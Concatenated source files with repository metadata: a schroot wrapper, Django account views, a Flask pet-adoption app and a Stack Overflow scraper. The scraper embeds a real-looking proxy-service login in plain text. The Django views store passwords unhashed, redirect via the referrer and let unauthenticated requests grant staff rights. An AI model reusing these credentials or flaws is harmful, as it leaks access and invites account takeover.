When :attr:`chroot_directory` is :data:`None` the schroot_ program gets
to pick the working directory inside the chroot (refer to the schroot
documentation for the complete details).
For non-interactive usage (which I anticipate to be the default usage
of :class:`ChangeRootCommand`) the schroot program simply assumes that
the working directory outside of the chroot also exists inside the
chroot, then fails with an error message when this is not the case.
Because this isn't a very robust default, :attr:`chroot_directory`
defaults to ``/`` instead.
"""
return '/'
@required_property
def chroot_name(self):
"""
The name of a chroot managed by schroot_ (a string).
This is expected to match one of the names configured in the directory
``/etc/schroot/chroot.d``.
"""
@mutable_property
def chroot_user(self):
"""
The name of the user inside the chroot to run the command as (a string or :data:`None`).
This defaults to :data:`None` which means to run as the current user.
"""
@property
def command_line(self):
"""
The complete `schroot` command including the command to run inside the chroot.
This is a list of strings with the `schroot` command line to enter
the requested chroot and execute :attr:`~.ExternalCommand.command`.
"""
schroot_command = list(self.schroot_command)
schroot_command.append('--chroot=%s' % self.chroot_name)
if self.chroot_user:
schroot_command.append('--user=%s' % self.chroot_user)
if self.chroot_directory:
schroot_command.append('--directory=%s' % self.chroot_directory)
# We only add the `--' to the command line when it will be followed by
# a command to execute inside the chroot. Emitting a trailing `--' that
# isn't followed by anything doesn't appear to bother schroot, but it
# does look a bit weird and may cause unnecessary confusion.
super_cmdline = list(super(ChangeRootCommand, self).command_line)
if super_cmdline:
schroot_command.append('--')
schroot_command.extend(super_cmdline)
return schroot_command
@property
def directory(self):
"""
Set the working directory inside the chroot.
When you set this property you change :attr:`chroot_directory`, however
reading back the property you'll just get :data:`.DEFAULT_WORKING_DIRECTORY`.
This is because the superclass :class:`.ExternalCommand` uses
:attr:`directory` as the working directory for the `schroot` command,
and directories inside chroots aren't guaranteed to exist on the host
system.
"""
return DEFAULT_WORKING_DIRECTORY
@directory.setter
def directory(self, value):
"""Redirect assignment from `directory` to `chroot_directory`."""
self.chroot_directory = value
@mutable_property
def schroot_command(self):
"""
The command used to run the `schroot` program.
This is a list of strings, by default the list contains just
:data:`SCHROOT_PROGRAM_NAME`. The :attr:`chroot_directory`,
:attr:`chroot_name` and :attr:`chroot_user` properties also
influence the `schroot` command line used.
"""
return [SCHROOT_PROGRAM_NAME]
|
[
"peter@peterodding.com"
] |
peter@peterodding.com
|
20ad32d0e1fa430b742e5d7a65c0f7f8b36dcd45
|
d125a7467b815ea3027567b0a6976c8ad730beb9
|
/src/itsmservice/apps/accounts/views.py
|
27a1e679c1ca4525aa082d97b45de129894a743f
|
[] |
no_license
|
sunyaxiong/itsmservice
|
06a1cb38b7314695613e2432f2e1d56c86aad815
|
e50fccae9ae536ac520337ec79b1d1c985e49aa4
|
refs/heads/master
| 2022-12-12T11:14:03.838601
| 2018-10-31T06:17:25
| 2018-10-31T06:17:25
| 137,029,391
| 0
| 0
| null | 2022-12-08T00:58:47
| 2018-06-12T06:50:01
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 6,092
|
py
|
import logging
import requests
import json
import urllib.parse as urllib
from django.shortcuts import render
from django.http import HttpResponseRedirect, JsonResponse
from django.contrib import auth,messages
from django.contrib.auth.decorators import login_required
from .forms import UserForm
from .forms import ProfileForm, PassResetForm
from .models import Profile, MessageAlert
from apps.cas_sync import models as cas_model
from itsmservice import settings
logger = logging.getLogger("django")
def index(request):
return render(request, 'index.html')
def login(request):
if request.method == 'GET':
form = UserForm()
return render(request, "login.html")
else:
form = UserForm(request.POST)
if form.is_valid():
username = request.POST.get('username')
password = request.POST.get('password')
# user = auth.authenticate(username=username, password=password)
attrs = {
"service": "http://{}".format(settings.SUCC_REDIRECT_URL)
}
url_attrs = urllib.urlencode(attrs)
print(settings.SUCC_REDIRECT_URL)
print(url_attrs)
cas_login_url = "{}login?{}".format(
settings.CAS_SERVER_URL, url_attrs
)
post_data = {
"username": username,
"password": password,
}
res = requests.post(cas_login_url, json.dumps(post_data))
print(dir(res))
print(res.status_code)
# return JsonResponse({})
return HttpResponseRedirect("/")
else:
return render(request, "login.html")
@login_required
def logout(request):
auth.logout(request)
return HttpResponseRedirect("/accounts/login/")
def user_profile(request):
user = request.user
url = request.META.get("HTTP_REFERER")
profile, profile_created = Profile.objects.get_or_create(username=user.username)
if request.method == "POST":
if request.POST.get("destroy"):
# 用户销毁
username = request.user.username
try:
cas_user = cas_model.app_user.objects.using("cas_db").get(username=username)
cas_user.delete(using="cas_db")
except Exception as e:
logger.info("cas用户: {} 删除异常".format(username), e)
return HttpResponseRedirect("/accounts/logout/")
form = ProfileForm(request.POST)
if form.is_valid():
data = form.data
email = data.get("email")
phone = data.get("phone")
profile.email = email
profile.phone = phone
profile.save()
return HttpResponseRedirect(url)
else:
messages.warning(request, "数据收敛失败")
return HttpResponseRedirect(url)
else:
if profile_created:
messages.warning(request, "用户配置文件自动创建,请维护具体信息")
form = ProfileForm()
return render(request, "user_profile.html", locals())
def pwd_restet(request):
"""
cas密码修改
:param request:
:return:
"""
url = request.META.get("HTTP_REFERER")
username = request.user.username
if request.method == "POST":
form = PassResetForm(request.POST)
if form.is_valid():
data = form.data
try:
user = cas_model.app_user.objects.using("cas_db").get(
username=username,
)
user.password = data.get("password")
user.save(using="cas_db")
return HttpResponseRedirect("/accounts/logout/")
except Exception as e:
logger.info(e)
messages.warning(request, "用户不存在")
return HttpResponseRedirect(url)
else:
logger.info("密码修改数据提交失败")
messages.warning(request, "密码提交失败,请重试")
return HttpResponseRedirect("url")
def user_confirm(request, pk):
page_header = "新用户审核"
confirm_message = MessageAlert.objects.get(id=int(pk))
content_list = confirm_message.content.split("-")
org, department, username = content_list[0], content_list[1], content_list[2]
profile = Profile.objects.filter(username=username).first()
if request.method == "GET":
return render(request, 'itsm/user_info_confirm.html', locals())
elif request.method == "POST":
pass
return render(request, 'itsm/issue_detail.html', locals())
def user_confirm_accept(request):
message_id = request.GET.get("id")
try:
message_info = MessageAlert.objects.get(id=int(message_id))
# 用户激活
user = User.objects.get(username=message_info.initiator)
user.is_active = 1
user.is_staff = 1
user.save()
# 消息查阅
message_info.checked = 1
message_info.save()
# cas 用户创建逻辑放到审核消息
cas_user, _ = cas_model.app_user.objects.using("cas_db").get_or_create(
username=user.username,
)
if _:
cas_user.password = user.password
cas_user.save(using="cas_db")
logger.info("CAS用户: {} 注册成功".format(cas_user.username))
logger.info("用户信息审核成功")
return HttpResponseRedirect("/itsm/event_list/")
except Exception as e:
logger.info(e, "用户信息审核失败")
messages.warning(request, "用户信息审核失败")
return HttpResponseRedirect("/itsm/event_list/")
def user_confirm_reject(request):
url = request.META.get('HTTP_REFERER')
message_id = request.GET.get("message_id")
try:
message_info = MessageAlert.objects.get(id=message_id)
# 消息查阅
message_info.checked = 1
message_info.save()
except Exception as e:
logger.info(e)
return HttpResponseRedirect(url)
|
[
"sunyaxiong"
] |
sunyaxiong
|
1f453f657f606a3a4274e6df7766ec853107d125
|
8c3491c0f0efe855bcfe5b7e26c4a23fca3e1159
|
/pages/urls.py
|
978db46628a5c919ab7535970cc247135178b45b
|
[] |
no_license
|
afandel/helloWorldProject
|
fc812dbf655ee27fcb6c889168e295c3c7a88e25
|
f01a7aac5b208fb9a4f3c2a9a72b70dae7a1ca01
|
refs/heads/master
| 2023-02-02T05:29:54.945839
| 2020-12-15T14:43:48
| 2020-12-15T14:43:48
| 306,415,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 120
|
py
|
from django.urls import path
from .views import homePageView
urlpatterns = [
path('', homePageView, name='home')
]
|
[
"adam.fandel@snhu.edu"
] |
adam.fandel@snhu.edu
|
bdd35f99daa2dc957e66138bd9bdef2f96a2e33f
|
09ce1b949b9ca0bd43adddb9b6a4742ef96d48d6
|
/Beginer/K-Fibonnaci/k-fibonacci.py
|
052f9f7ddf868cf2778e7aaa7289b4247f8165c8
|
[] |
no_license
|
melwyn95/CodeChef-Problems
|
11e133997ae0197fbd0b68f4918e0ff45e8cd0c8
|
0c7f2e0da47cde0c781b8a970e8b28b7856be969
|
refs/heads/master
| 2020-06-21T18:26:11.130334
| 2017-12-26T12:06:58
| 2017-12-26T12:06:58
| 74,776,576
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
n, k = map(int, raw_input().split())
a = [0]
def T(n, k):
if n <= k: return 1
return a[n-1] - a[n-k-1]
for i in range(1, n+1):
a.append(a[i-1] + T(i, k))
print (a.pop()-a.pop()) % 1000000007
|
[
"melwyn95@gmail.com"
] |
melwyn95@gmail.com
|
751894ece0a71fa109934a6abbd09b3e1c5b95a4
|
28cabf3c73c667a92a7a43c0a61fc5b672034cb4
|
/src/workouts/migrations/0004_rowingworkout_owner.py
|
d4b4b799769c0c22a1e9b0b5bbbff9d54dc6d2b7
|
[] |
no_license
|
ashleyelaine/LogMyRow
|
48943efabcb6b3048871eab95d0cba8eab46c4a3
|
24d0447670ab7aaefa4b413d207eb6c784ef1662
|
refs/heads/master
| 2021-09-07T08:09:07.765560
| 2018-02-09T20:58:10
| 2018-02-09T20:58:10
| 113,527,859
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-01-18 21:02
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('workouts', '0003_auto_20171209_2023'),
]
operations = [
migrations.AddField(
model_name='rowingworkout',
name='owner',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
[
"ashleyelainewright@gmail.com"
] |
ashleyelainewright@gmail.com
|
52dba0de037cc4fcaccbec0e66a5651c875897d3
|
efcc32acc681f0cf88416b75623cf976e71f6447
|
/data_utils.py
|
bfba59f627fac61f139b259554e64e518d818e01
|
[] |
no_license
|
jacobperricone/224w
|
7d5aacc525d25fe27d7c0e55c38dc920c7428ebe
|
8a3441371c3198c5d09ae8d7d0701df4b988371d
|
refs/heads/master
| 2022-12-03T17:35:25.905597
| 2020-08-17T16:32:26
| 2020-08-17T16:32:26
| 113,819,720
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,129
|
py
|
from lxml import html
import blocks.create_dict_from_element.core as cdfe
from multiprocessing.pool import ThreadPool
import logging
USER_AGENTS = [
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0'
]
PROXIES = [
{'http': 'http://solutionloft:fallSL2016!@us-il.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-il.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us-dc.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-dc.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us-ca.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-ca.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us-ny.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-ny.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@us-ny.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@us-ny.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@de.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@de.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@nl.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@nl.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@sg.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@sg.proxymesh.com:31280'},
{'http': 'http://solutionloft:fallSL2016!@uk.proxymesh.com:31280',
'https': 'http://solutionloft:fallSL2016!@uk.proxymesh.com:31280'}
]
logger = logging.getLogger('stackoverflow')
logger.setLevel(logging.DEBUG)
def get_code(x):
"""
parses code from an html body object
:param x: HTML object
:return: Code as a string
"""
try:
code = x[0].xpath(x[1])
if len(code):
if len(code) == 1:
return code[0].replace('>>>', '').replace('...', '')
else:
return "[break]".join(code).replace('>>>', '').replace('...', '\t')
else:
return None
except Exception as e:
logger.error("Failed in fetching question code: {}".format(e))
return None
def get_text(x):
"""
parses text from an html body object
:param x: HTML object
:return: Text of body as a string
"""
try:
text = x[0].xpath(x[1])
if len(text):
if len(text) == 1:
return text[0]
else:
return "\n".join(text)
else:
return None
except Exception as e:
logger.error("Failed in fetching text {}".format(e, x))
return None
def parse(page, settings):
"""
:param page: an html object corresponding to the body to be examined
:param settings: a dictionary specifiying attributes
:return: a list of parsed results
"""
results = []
try:
val_xpath = settings['xpath']
inputs = [(x, settings['per_item'], settings['aux']) for x in page.xpath(val_xpath)]
# logger.info(inputs)
if len(inputs) > 1:
num_processes = 10
pool = ThreadPool(num_processes)
results = pool.map(unpack, inputs)
pool.close()
pool.join()
else:
if inputs:
results = [cdfe.main(*inputs[0])]
else:
results = []
return results
except Exception as error:
logger.info("Failed to get info for data elements with and error {}"
.format(error))
return results
def unpack(x):
res = cdfe.main(*x)
return res
def parse_body(body):
page = html.fromstring(body)
question_settings = [
{"keyName": "code",
"xpath": "//*[local-name() = 'code']/text()",
"func": get_code,
"val": None},
{"keyName": "text",
"xpath": "//*[local-name() != 'code']/text()",
"func": get_text,
"val": None},
]
question_inputs = {
'settings': {'xpath': ".",
"global_entries": [],
'aux': [],
'per_item': question_settings
}
}
results = parse(page, **question_inputs)
return results[0]
|
[
"jacobperricone@gmail.com"
] |
jacobperricone@gmail.com
|
0a2a7ce05cf67f530675273c267d6596dc1d0fa9
|
f08371a6744d3636cbd1dd4ec0cb17acb490e61e
|
/devtrac/main/templatetags/extra_filters.py
|
e39c4b2745838f833ed9f23c2056fec2cb209856
|
[] |
no_license
|
onaio/ona-devtrac
|
ae99fa9f3a4d6212a573ee42b81a760f7c5d25e1
|
9a8717a00ed9f8dc9e258d879480b2e8f88e886b
|
refs/heads/master
| 2021-05-27T22:22:14.622115
| 2014-06-06T13:03:50
| 2014-06-06T13:03:50
| 15,524,099
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
from django import template
register = template.Library()
@register.filter(name='get')
def get(d, key):
return d.get(key, None)
|
[
"ukanga@gmail.com"
] |
ukanga@gmail.com
|
2e35a2db7708b9c8f6dd10eedd43ae780b7c92c7
|
7b6b46395b0e8748282916186c608ce15356e0df
|
/Flask/Flask_database/DatabaseInViews/adoption.py
|
836b611008939703fed5c4c729af3ec5fe0d9f4d
|
[] |
no_license
|
Hopw06/Web
|
1a2d2499a19153552b7452c0b9200af4bfa3bbd2
|
763ff13a60903f0969db30e924c76426669fd04c
|
refs/heads/master
| 2023-01-12T14:03:23.886586
| 2020-11-14T14:59:16
| 2020-11-14T14:59:16
| 303,758,846
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,793
|
py
|
import os
from forms import AddForm, DelForm, AddOwnerForm
from flask import Flask, render_template, url_for, redirect
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
app = Flask(__name__)
app.config['SECRET_KEY'] = 'mysecretkey'
#######################
##### SQL Database #####
#######################
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
migrate = Migrate(app, db)
######################
#### Models ###########
######################
class Puppy(db.Model):
__tablename__ = 'puppies'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
owner = db.relationship("Owner", backref="puppy", uselist=False)
def __init__(self, name):
self.name = name
def __repr__(self):
if self.owner == None:
return "Puppy name: {}, and has not owner yet".format(self.name)
return "Puppy name {}, and has owner: {}".format(self.name, self.owner.name)
class Owner(db.Model):
__tablename__ = 'owner'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
id_pup = db.Column(db.Integer, db.ForeignKey("puppies.id"))
def __init__(self, name, id_pup):
self.name = name
self.id_pup = id_pup
#######################################
###### View functions - Have Forms ########
#######################################
@app.route("/")
def index():
return render_template("home.html")
@app.route("/add", methods=["GET", "POST"])
def add_pup():
form = AddForm()
if form.validate_on_submit():
name = form.name.data
if name != None and name != "":
exists = Puppy.query.filter_by(name=name).first()
if exists == None:
new_pup = Puppy(name)
db.session.add(new_pup)
db.session.commit()
return redirect(url_for('list_pups'))
else:
return render_template("error.html", error="Puppy is already in system.")
else:
return render_template("error.html", error="Please enter puppy name.")
return render_template("add.html", form=form)
@app.route("/list")
def list_pups():
puppies = Puppy.query.all()
return render_template("list.html", puppies=puppies)
@app.route("/delete", methods=["GET", "POST"])
def delete_pup():
form = DelForm()
if form.validate_on_submit():
id = form.id.data
pup = Puppy.query.get(id)
if pup != None:
db.session.delete(pup)
db.session.commit()
return redirect(url_for('list_pups'))
else:
return render_template("error.html", error="Id you provided is not valid.")
return render_template("delete.html", form=form)
@app.route("/addOwner", methods=["GET", "POST"])
def add_owner():
form = AddOwnerForm()
if form.validate_on_submit():
id_puppy = form.id_puppy.data
owner = form.owner.data
if owner != "" and id_puppy != "":
puppy = Puppy.query.get(id_puppy)
if puppy != None and puppy.owner == None:
owner = Owner(owner, id_puppy)
db.session.add(owner)
db.session.commit()
return redirect(url_for('list_pups'))
else:
return render_template("error.html", error="Puppy id you provided is not valid")
else:
return render_template("error.html", error="Please enter owner's name and puppy id.")
return render_template("addOwner.html", form=form)
if __name__ == "__main__":
app.run(debug=True)
|
[
"vuxuanphong06@gmail.com"
] |
vuxuanphong06@gmail.com
|
b3d474831ed9dde5f79af090a1517ff329248f8d
|
79127ff15a2a43ca185b4ad2e4346914be946029
|
/myblog/boards/views.py
|
81940479dcda58361f9af8a2e084c4efeef3129e
|
[] |
no_license
|
yanHuaiQ/tencent-cloud
|
21ef8ead44b7941557388bca820dd862dd1815b7
|
f793982ee2c8d5b02a5dd840fc53313bcef2f857
|
refs/heads/master
| 2021-05-21T18:03:54.637474
| 2020-04-03T13:54:27
| 2020-04-03T13:54:27
| 252,746,006
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 121
|
py
|
from django.shortcuts import render
def home(request):
return HttpResponse('Hello World')
# Create your views here.
|
[
"841543613@qq.com"
] |
841543613@qq.com
|
a35580442a22de2f6b308f8d52a0c5a22d032ee1
|
67033f2a1c74822398846836d79bb9fc5b914b87
|
/blog/migrations/0006_auto_20200323_1241.py
|
0935b99fbc679a226070c0f764c2827e6b4a6b6a
|
[] |
no_license
|
Adi1222/Blog-Project
|
9d4b3ef94428622fb0b85356eb9584105aeda19b
|
6299d28122ca0d4b9d8437307c8730fc4797ef76
|
refs/heads/master
| 2021-04-17T23:18:49.037312
| 2020-08-16T06:51:26
| 2020-08-16T06:51:26
| 249,484,778
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
# Generated by Django 2.2.6 on 2020-03-23 07:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_auto_20200323_0150'),
]
operations = [
migrations.AlterField(
model_name='userposts',
name='img',
field=models.ImageField(blank=True, upload_to='blog_image'),
),
]
|
[
"adityachavan677@gmail.com"
] |
adityachavan677@gmail.com
|
80639dd415ef5ede0bc62e8709093e3bbcd3f93e
|
8eb1f77de15b579ed171182d70ee516883f4b032
|
/main.py
|
78d442f127c793317feda2619b71442161ff7a17
|
[] |
no_license
|
luciql33t/telegalolz
|
5dd6c8f637087770b5dfe6f40a77ba5a7bb04e45
|
23aa8ae0ca17e86c810d702e5222f51d9e745f7c
|
refs/heads/main
| 2023-01-04T07:56:56.766174
| 2020-11-03T11:06:13
| 2020-11-03T11:06:13
| 309,659,078
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
import requests
import bs4 as bs
import time
url = 'https://t.me/'
t = 2000000
with open('list.txt', 'r') as f:
ids = [line.strip() for line in f]
while True:
for id in ids:
page = requests.get(url + id)
soup = bs.BeautifulSoup(page.text, 'html.parser')
stat = soup.findAll('div', class_='tgme_page_title')
if not stat:
print(id + ' ----------------------------------------!!!')
with open('file.txt', 'a') as file:
file.write(id + '\n')
else:
print(id + ' ')
time.sleep(1)
time.sleep(t)
print(stat)
|
[
"noreply@github.com"
] |
luciql33t.noreply@github.com
|
5c865faf8ac12abbd353e5aa7fa31f5a337f5249
|
ed76db3a268a9253837e85130c0f221bd904bff0
|
/DP/[x] 560. Subarray Sum Equals K.py
|
85e9cb792a05b9869a13dd45ba2d1f4cf74e2541
|
[] |
no_license
|
jay-joo-code/leetcode
|
f54db01f195f35d436e524d6e257ad755525eb69
|
349bd6d54a3f463499b9f59d7aec01c9dd1fc9d0
|
refs/heads/master
| 2022-11-30T21:17:34.602100
| 2020-08-09T05:55:37
| 2020-08-09T05:55:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,175
|
py
|
# attempt 1 (failed)
def subarraySum(self, nums: List[int], k: int) -> int:
# doesn't consider negative elements in nums
acc = 0
count = 0
for i in range(len(nums)):
for j in range(i, len(nums)):
acc += nums[j]
if acc == k:
count += 1
acc = 0
break
elif acc > k:
acc = 0
break
return count
# attempt 2 (failed)
def subarraySum(self, nums: List[int], k: int) -> int:
# uses matrix as DP to store previous sums
# still exceeds time limit
count = 0
matrix = [[None] * len(nums) for _ in range(len(nums))]
for i in range(len(nums)):
if nums[i] == k: count += 1
matrix[i][i] = nums[i]
for row in range(len(nums)-1):
for col in range(row+1, len(nums)):
if row == 0:
matrix[row][col] = matrix[row][col-1] + nums[col]
else:
matrix[row][col] = matrix[row-1][col] - nums[row-1]
if matrix[row][col] == k:
count += 1
return count
# solution
def subarraySum(self, nums: List[int], k: int) -> int:
count = 0
sum = 0
sums = { 0: 1 }
for num in nums:
sum += num
if sum-k in sums:
count += sums[sum-k]
if sum in sums:
sums[sum] += 1
else:
sums[sum] = 1
return count
|
[
"jae@Jaes-MacBook-Air.local"
] |
jae@Jaes-MacBook-Air.local
|
7db5d35dbccea6fead70c32527134a787b99e276
|
1fe186fc74156a27bf632ab3694e38b9219b86a8
|
/python/test_data.py
|
12a560c9fb35847a139de6aa6c9a0039dde4489c
|
[
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
qchenclaire/caffe
|
53b0afb4963d8e9a50f45342e92ab4499012614e
|
e7b40681209b1266af919d76d4198c6d2560ae5b
|
refs/heads/master
| 2021-01-19T13:11:18.013451
| 2017-04-12T22:47:40
| 2017-04-12T22:47:40
| 88,069,682
| 1
| 0
| null | 2017-04-12T15:48:22
| 2017-04-12T15:48:22
| null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
import caffe
import numpy as np
import random
import os, struct
from array import array
import share_data as sd
#from lmdb_reader import Read_Render4CNN
from lmdb_para import read_lmdb
import scipy.misc
import time
import pdb
import cPickle as pickle
#
class Render4CNNLayer_sub(caffe.Layer):
def setup(self, bottom, top):
print 'setup'
def reshape(self, bottom, top):
print 'reshape'
def forward(self, bottom, top):
print 'forward'
def backward(self, top, propagate_down, bottom):
print 'backward'
|
[
"qchen42@jhu.edu"
] |
qchen42@jhu.edu
|
c86e3a5ca3ef835199bd744fc5510a60133a16db
|
0e478f3d8b6c323c093455428c9094c45de13bac
|
/src/OTLMOW/OTLModel/Datatypes/DtcBeschermingVraatschade.py
|
8549c8df08b86c0c406b3f81a22fa46f65a82c8c
|
[
"MIT"
] |
permissive
|
davidvlaminck/OTLMOW
|
c6eae90b2cab8a741271002cde454427ca8b75ba
|
48f8c357c475da1d2a1bc7820556843d4b37838d
|
refs/heads/main
| 2023-01-12T05:08:40.442734
| 2023-01-10T15:26:39
| 2023-01-10T15:26:39
| 432,681,113
| 3
| 1
|
MIT
| 2022-06-20T20:36:00
| 2021-11-28T10:28:24
|
Python
|
UTF-8
|
Python
| false
| false
| 2,781
|
py
|
# coding=utf-8
from OTLMOW.OTLModel.BaseClasses.AttributeInfo import AttributeInfo
from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut
from OTLMOW.OTLModel.Datatypes.BooleanField import BooleanField
from OTLMOW.OTLModel.Datatypes.ComplexField import ComplexField
from OTLMOW.OTLModel.Datatypes.KlMateriaalBeschermingVraatschade import KlMateriaalBeschermingVraatschade
# Generated with OTLComplexDatatypeCreator. To modify: extend, do not edit
class DtcBeschermingVraatschadeWaarden(AttributeInfo):
def __init__(self, parent=None):
AttributeInfo.__init__(self, parent)
self._materiaal = OTLAttribuut(field=KlMateriaalBeschermingVraatschade,
naam='materiaal',
label='materiaal',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#DtcBeschermingVraatschade.materiaal',
definition='De middelen als bescherming tegen vraatschade.',
owner=self)
self._tegenMaaischade = OTLAttribuut(field=BooleanField,
naam='tegenMaaischade',
label='tegen maaischade',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#DtcBeschermingVraatschade.tegenMaaischade',
definition='Aanduiding of er bescherming tegen maaischade aanwezig is.',
owner=self)
@property
def materiaal(self):
"""De middelen als bescherming tegen vraatschade."""
return self._materiaal.get_waarde()
@materiaal.setter
def materiaal(self, value):
self._materiaal.set_waarde(value, owner=self._parent)
@property
def tegenMaaischade(self):
"""Aanduiding of er bescherming tegen maaischade aanwezig is."""
return self._tegenMaaischade.get_waarde()
@tegenMaaischade.setter
def tegenMaaischade(self, value):
self._tegenMaaischade.set_waarde(value, owner=self._parent)
# Generated with OTLComplexDatatypeCreator. To modify: extend, do not edit
class DtcBeschermingVraatschade(ComplexField, AttributeInfo):
"""Complex datatype voor bescherming van de stam tegen knaagdieren."""
naam = 'DtcBeschermingVraatschade'
label = 'Bescherming vraatschade'
objectUri = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#DtcBeschermingVraatschade'
definition = 'Complex datatype voor bescherming van de stam tegen knaagdieren.'
waardeObject = DtcBeschermingVraatschadeWaarden
def __str__(self):
return ComplexField.__str__(self)
|
[
"david.vlaminck@mow.vlaanderen.be"
] |
david.vlaminck@mow.vlaanderen.be
|
3854d86404411f1bba56b485b61bfda44efeb2f0
|
0f9a8549df83e39eb29012588c01c5fc434f4e4b
|
/menu/admin.py
|
e21ab520a36361c30a408efeec382301187e294e
|
[] |
no_license
|
f4225e0653/recipedb
|
729c53495a9329290a30f9b821e9def233d14bd4
|
d03943b6da5e0ab900fcd9d44388ff5997757eab
|
refs/heads/master
| 2021-01-22T20:55:43.598122
| 2017-03-18T07:54:17
| 2017-03-18T07:54:17
| 85,380,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
from django.contrib import admin
from .models import Recipe, RecipeIngredients
# Register your models here.
admin.site.register(Recipe)
admin.site.register(RecipeIngredients)
|
[
"nobody@nowhere.local"
] |
nobody@nowhere.local
|
599d158a305a75174cd7625ca13fb5240c520bcb
|
ceea602d004e21c85c925b3b5b259db49eec17d7
|
/flatpage_extended/urls.py
|
f09e3f5b2d2b044993e71b30481df8264dc03227
|
[] |
no_license
|
seivan/django_blog
|
38426c4477a7e12c50534ecfaadac9a569556f62
|
9cb7a35d6a5b5e29ff8c4ae5cb3c0c1441191c6b
|
refs/heads/master
| 2020-12-24T13:17:22.003468
| 2009-11-25T04:27:52
| 2009-11-25T04:27:52
